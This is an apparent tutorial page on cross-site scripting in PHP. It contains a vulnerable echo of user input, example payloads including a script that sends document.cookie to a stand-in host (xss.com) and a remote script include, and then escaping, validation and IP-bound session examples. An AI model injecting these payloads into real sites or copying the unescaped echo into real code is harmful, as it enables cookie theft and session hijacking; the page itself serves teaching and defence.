Cross Site Scripting (XSS)

Definition: http://en.wikipedia.org/wiki/Cross-site_scripting

XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.

Example:

<?php echo $_POST['name']; ?>

Examples of XSS exploits:

<script>alert('xss')</script>

<script>new Image().src='http://xss.com/xss.php?cookies='+encodeURI(document.cookie)</script>

<script src="http://xss.com/xss.js"></script>

Protection:

– Validate the input

– Escape the input / output (encode the data for the context it is written into, here the HTML body, at the point it is output)

<?php echo htmlentities($_POST['name'], ENT_QUOTES, 'UTF-8'); ?>
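The following is an added example, not code from the original page. It places the page's vulnerable echo beside a hardened version that first validates the input against an allowlist and then escapes it for the HTML body with htmlentities. The submitted form is simulated with a constructed $_POST array so the script runs from the command line; the name policy in validateName is an assumption made for this example.

```php
<?php
declare(strict_types=1);

// Added example (not from the original page): vulnerable echo vs.
// validate-then-escape. Run with: php xss_demo.php

/** Vulnerable: tainted data enters HTML unescaped (the page's first snippet). */
function renderVulnerable(string $name): string
{
    return '<p>Hello, ' . $name . '</p>';
}

/**
 * Validate: allowlist of characters a display name may contain
 * (letters, combining marks, spaces, apostrophes, hyphens; 1 to 64 chars).
 * The policy itself is an assumption for this example.
 */
function validateName(string $name): bool
{
    return preg_match('/^[\p{L}\p{M}\' -]{1,64}$/u', $name) === 1;
}

/** Escape for the HTML-body context, as in the page's htmlentities call. */
function renderSafe(string $name): string
{
    return '<p>Hello, ' . htmlentities($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Constructed inputs: a benign name, a name containing a quote, and the
// page's first exploit string.
$inputs = [
    'Alice',
    "Conan O'Brien",
    "<script>alert('xss')</script>",
];

foreach ($inputs as $input) {
    $_POST = ['name' => $input];   // constructed stand-in for the submitted form
    echo "input:      {$_POST['name']}\n";
    echo "vulnerable: " . renderVulnerable($_POST['name']) . "\n";
    echo "validated:  " . (validateName($_POST['name']) ? 'accepted' : 'rejected') . "\n";
    echo "escaped:    " . renderSafe($_POST['name']) . "\n\n";
}
```

Validation and escaping are complementary: the allowlist rejects the script payload outright, while escaping makes the same string inert even where a looser policy lets it through, and a name with an apostrophe passes validation and is still encoded because ENT_QUOTES is set.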

– Only allow the same IP to access the cookie (bind the session cookie to the client IP address that created the session, so a stolen cookie presented from another address is rejected)
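As an added example of the last point, not the page's own code, the script below binds a session to the client IP that created it and refuses the cookie when it is presented from a different address. The session store and the requests are simulated with arrays and constructed documentation-range IP addresses so it runs from the command line; in a real application the client address would come from $_SERVER['REMOTE_ADDR'].

```php
<?php
declare(strict_types=1);

// Added example (not from the original page): session cookie bound to the
// originating client IP. The in-memory $store stands in for the server-side
// session storage.

/** Create a session record bound to the client IP that requested it. */
function createSession(array &$store, string $clientIp, string $user): string
{
    $sid = bin2hex(random_bytes(16));          // unguessable session id
    $store[$sid] = ['ip' => $clientIp, 'user' => $user];
    return $sid;
}

/** Return the session only if the cookie is presented from the bound IP. */
function resolveSession(array $store, string $cookieSid, string $clientIp): ?array
{
    if (!isset($store[$cookieSid])) {
        return null;                            // unknown or expired session
    }
    if (!hash_equals($store[$cookieSid]['ip'], $clientIp)) {
        // Possible replay of a stolen cookie: record it and deny access.
        error_log("session {$cookieSid} presented from {$clientIp}, bound to {$store[$cookieSid]['ip']}");
        return null;
    }
    return $store[$cookieSid];
}

$store = [];
$sid = createSession($store, '203.0.113.10', 'alice');   // constructed client address

// The legitimate browser sends the cookie from the address that created it.
var_dump(resolveSession($store, $sid, '203.0.113.10'));

// The same cookie value presented from a different, constructed address.
var_dump(resolveSession($store, $sid, '198.51.100.7'));
```

IP binding only limits what a leaked cookie is worth; it does not stop the leak, and it breaks sessions for users whose address changes mid-session (mobile networks, shared NAT), so it belongs alongside output escaping rather than in place of it.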